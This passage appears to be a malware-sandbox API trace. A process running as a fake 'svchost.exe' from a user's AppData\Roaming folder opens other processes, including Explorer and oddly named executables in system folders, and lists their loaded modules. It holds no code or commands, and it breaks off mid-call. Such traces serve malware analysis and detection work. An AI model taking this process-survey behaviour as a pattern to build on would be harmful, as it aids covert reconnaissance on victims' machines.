(in: hProcess=0x214, hModule=0x7fef9780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")) returned 0x25 [0067.335] CoTaskMemFree (pv=0xd910e0) [0067.335] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6df0000, lpmodinfo=0x24a7240, cb=0x18 | out: lpmodinfo=0x24a7240*(lpBaseOfDll=0x7fef6df0000, SizeOfImage=0x3c000, EntryPoint=0x7fef6e15aa8)) returned 1 [0067.337] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.337] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6df0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wmiprov.dll") returned 0xb [0067.340] CoTaskMemFree (pv=0xd910e0) [0067.340] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.340] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6df0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll")) returned 0x24 [0067.343] CoTaskMemFree (pv=0xd910e0) [0067.343] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6d60000, lpmodinfo=0x24a9410, cb=0x18 | out: lpmodinfo=0x24a9410*(lpBaseOfDll=0x7fef6d60000, SizeOfImage=0x86000, EntryPoint=0x7fef6d6ffd0)) returned 1 [0067.345] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.345] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6d60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wbemcomn.dll") returned 0xc [0067.348] CoTaskMemFree (pv=0xd910e0) [0067.348] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.348] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6d60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")) returned 0x20 [0067.351] CoTaskMemFree (pv=0xd910e0) [0067.351] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef2930000, lpmodinfo=0x24ab5e0, cb=0x18 | out: lpmodinfo=0x24ab5e0*(lpBaseOfDll=0x7fef2930000, SizeOfImage=0x25000, EntryPoint=0x7fef2948d6c)) returned 1 [0067.354] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.354] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef2930000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WmiPerfClass.dll") returned 0x10 [0067.357] CoTaskMemFree (pv=0xd910e0) [0067.357] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.357] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef2930000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll")) returned 0x29 [0067.360] CoTaskMemFree (pv=0xd910e0) [0067.360] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef28e0000, lpmodinfo=0x24ad7c8, cb=0x18 | out: lpmodinfo=0x24ad7c8*(lpBaseOfDll=0x7fef28e0000, SizeOfImage=0x4e000, EntryPoint=0x7fef28e1198)) returned 1 [0067.362] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.362] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef28e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="pdh.dll") returned 0x7 [0067.366] CoTaskMemFree (pv=0xd910e0) [0067.366] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.366] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef28e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll")) returned 0x1b [0067.369] CoTaskMemFree (pv=0xd910e0) [0067.369] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd2a0000, lpmodinfo=0x24af978, cb=0x18 | out: lpmodinfo=0x24af978*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0067.372] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.372] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0067.375] CoTaskMemFree (pv=0xd910e0) [0067.375] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.375] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0067.378] CoTaskMemFree (pv=0xd910e0) [0067.378] CloseHandle (hObject=0x214) returned 1 [0067.389] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0067.389] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x214 [0067.389] EnumProcessModules (in: hProcess=0x214, lphModule=0x24b2b88, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24b2b88, lpcbNeeded=0x23ee40) returned 1 [0067.390] GetModuleInformation (in: hProcess=0x214, hModule=0xe20000, lpmodinfo=0x24b2df8, cb=0x18 | out: lpmodinfo=0x24b2df8*(lpBaseOfDll=0xe20000, SizeOfImage=0x17000, EntryPoint=0xe214a1)) returned 1 [0067.390] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.391] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xe20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="than_part.exe") returned 0xd [0067.391] CoTaskMemFree (pv=0xd910e0) [0067.391] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.391] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xe20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\than_part.exe" (normalized: "c:\\program files (x86)\\internet explorer\\than_part.exe")) returned 0x36 [0067.392] CoTaskMemFree (pv=0xd910e0) [0067.392] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24b5028, cb=0x18 | out: lpmodinfo=0x24b5028*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0067.392] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.392] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0067.393] CoTaskMemFree (pv=0xd910e0) [0067.393] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.393] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0067.393] CoTaskMemFree (pv=0xd910e0) [0067.394] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24b7200, cb=0x18 | out: lpmodinfo=0x24b7200*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0067.394] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.394] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0067.395] CoTaskMemFree (pv=0xd910e0) [0067.395] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.395] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0067.395] CoTaskMemFree (pv=0xd910e0) [0067.395] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24b93c0, cb=0x18 | out: lpmodinfo=0x24b93c0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0067.396] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.396] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0067.396] CoTaskMemFree (pv=0xd910e0) [0067.396] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.396] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0067.397] CoTaskMemFree (pv=0xd910e0) [0067.397] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24bb590, cb=0x18 | out: lpmodinfo=0x24bb590*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0067.397] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.397] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0067.398] CoTaskMemFree (pv=0xd910e0) [0067.398] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.398] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0067.399] CoTaskMemFree (pv=0xd910e0) [0067.399] CloseHandle (hObject=0x214) returned 1 [0067.400] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0067.400] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb68) returned 0x214 [0067.400] EnumProcessModules (in: hProcess=0x214, lphModule=0x24bdcb0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24bdcb0, lpcbNeeded=0x23ee40) returned 1 [0067.401] GetModuleInformation (in: hProcess=0x214, hModule=0x1010000, lpmodinfo=0x24bdf20, cb=0x18 | out: lpmodinfo=0x24bdf20*(lpBaseOfDll=0x1010000, SizeOfImage=0x17000, EntryPoint=0x10114a1)) returned 1 [0067.401] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.401] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x1010000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0067.401] CoTaskMemFree (pv=0xd910e0) [0067.401] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.401] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x1010000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Mail\\foxmailincmail.exe" (normalized: "c:\\program files\\windows mail\\foxmailincmail.exe")) returned 0x30 [0067.402] CoTaskMemFree (pv=0xd910e0) [0067.402] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24c0150, cb=0x18 | out: lpmodinfo=0x24c0150*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0067.402] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.402] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0067.403] CoTaskMemFree (pv=0xd910e0) [0067.403] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.403] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0067.403] CoTaskMemFree (pv=0xd910e0) [0067.403] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24c2310, cb=0x18 | out: lpmodinfo=0x24c2310*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0067.404] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.404] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0067.404] CoTaskMemFree (pv=0xd910e0) [0067.404] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.404] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0067.405] CoTaskMemFree (pv=0xd910e0) [0067.405] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24c44d0, cb=0x18 | out: lpmodinfo=0x24c44d0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0067.405] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.405] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0067.406] CoTaskMemFree (pv=0xd910e0) [0067.406] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.406] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0067.406] CoTaskMemFree (pv=0xd910e0) [0067.406] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24c66a0, cb=0x18 | out: lpmodinfo=0x24c66a0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0067.407] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.407] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0067.407] CoTaskMemFree (pv=0xd910e0) [0067.408] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.408] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0067.408] CoTaskMemFree (pv=0xd910e0) [0067.408] CloseHandle (hObject=0x214) returned 1 [0067.410] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0067.410] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x214 [0067.410] EnumProcessModules (in: hProcess=0x214, lphModule=0x24c8dc0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24c8dc0, lpcbNeeded=0x23ee40) returned 1 [0067.420] EnumProcessModules (in: hProcess=0x214, lphModule=0x24c8ff0, cb=0x400, lpcbNeeded=0x23ee40 | out: lphModule=0x24c8ff0, lpcbNeeded=0x23ee40) returned 1 [0067.431] EnumProcessModules (in: hProcess=0x214, lphModule=0x24c9408, cb=0x800, lpcbNeeded=0x23ee40 | out: lphModule=0x24c9408, lpcbNeeded=0x23ee40) returned 1 [0067.441] GetModuleInformation (in: hProcess=0x214, hModule=0xff980000, lpmodinfo=0x24c9c78, cb=0x18 | out: lpmodinfo=0x24c9c78*(lpBaseOfDll=0xff980000, SizeOfImage=0x2c0000, EntryPoint=0xff9ab790)) returned 1 [0067.441] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.441] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="Explorer.EXE") returned 0xc [0067.442] CoTaskMemFree (pv=0xd910e0) [0067.442] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.442] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\Explorer.EXE" (normalized: "c:\\windows\\explorer.exe")) returned 0x17 [0067.442] CoTaskMemFree (pv=0xd910e0) [0067.442] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24cbe68, cb=0x18 | out: lpmodinfo=0x24cbe68*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0067.443] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.443] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0067.443] CoTaskMemFree (pv=0xd910e0) [0067.443] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.443] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0067.444] CoTaskMemFree (pv=0xd910e0) [0067.444] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x24ce028, cb=0x18 | out: lpmodinfo=0x24ce028*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0067.444] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.444] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0067.445] CoTaskMemFree (pv=0xd910e0) [0067.445] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.445] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0067.446] CoTaskMemFree (pv=0xd910e0) [0067.446] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x24d01f8, cb=0x18 | out: lpmodinfo=0x24d01f8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0067.446] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.446] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0067.447] CoTaskMemFree (pv=0xd910e0) [0067.447] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.447] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0067.447] CoTaskMemFree (pv=0xd910e0) [0067.447] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x24d23c8, cb=0x18 | out: lpmodinfo=0x24d23c8*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0067.448] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.448] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0067.448] CoTaskMemFree (pv=0xd910e0) [0067.448] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.448] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0067.449] CoTaskMemFree (pv=0xd910e0) [0067.449] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x24d45f0, cb=0x18 | out: lpmodinfo=0x24d45f0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0067.450] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.450] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0067.450] CoTaskMemFree (pv=0xd910e0) [0067.450] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.450] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0067.451] CoTaskMemFree (pv=0xd910e0) [0067.451] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x24d67b0, cb=0x18 | out: lpmodinfo=0x24d67b0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0067.452] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.452] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0067.452] CoTaskMemFree (pv=0xd910e0) [0067.452] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.453] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0067.453] CoTaskMemFree (pv=0xd910e0) [0067.453] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x24d8970, cb=0x18 | out: lpmodinfo=0x24d8970*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0067.454] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.454] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0067.455] CoTaskMemFree (pv=0xd910e0) [0067.455] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.455] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0067.456] CoTaskMemFree (pv=0xd910e0) [0067.456] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x24dab30, cb=0x18 | out: lpmodinfo=0x24dab30*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0067.456] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.457] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0067.458] CoTaskMemFree (pv=0xd910e0) [0067.458] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.458] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0067.459] CoTaskMemFree (pv=0xd910e0) [0067.459] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x24dcd88, cb=0x18 | out: lpmodinfo=0x24dcd88*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0067.460] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.460] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0067.461] CoTaskMemFree (pv=0xd910e0) [0067.461] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.461] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0067.462] CoTaskMemFree (pv=0xd910e0) [0067.462] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x24def48, cb=0x18 | out: lpmodinfo=0x24def48*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0067.463] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.463] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0067.464] CoTaskMemFree (pv=0xd910e0) [0067.464] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.464] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0067.465] CoTaskMemFree (pv=0xd910e0) [0067.465] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x24e10f8, cb=0x18 | out: lpmodinfo=0x24e10f8*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0067.466] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.466] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0067.467] CoTaskMemFree (pv=0xd910e0) [0067.467] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.467] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0067.468] CoTaskMemFree (pv=0xd910e0) [0067.468] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff2d0000, lpmodinfo=0x24e32d0, cb=0x18 | out: lpmodinfo=0x24e32d0*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0067.469] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.469] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff2d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0067.470] CoTaskMemFree (pv=0xd910e0) [0067.470] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.470] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff2d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0067.471] CoTaskMemFree (pv=0xd910e0) [0067.471] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefe070000, lpmodinfo=0x24e5490, cb=0x18 | out: lpmodinfo=0x24e5490*(lpBaseOfDll=0x7fefe070000, SizeOfImage=0xd88000, EntryPoint=0x7fefe0ecebc)) returned 1 [0067.472] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.472] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefe070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SHELL32.dll") returned 0xb [0067.474] CoTaskMemFree (pv=0xd910e0) [0067.474] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.474] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefe070000, lpFilename=0xd910e0, nSize=0x800 | out: 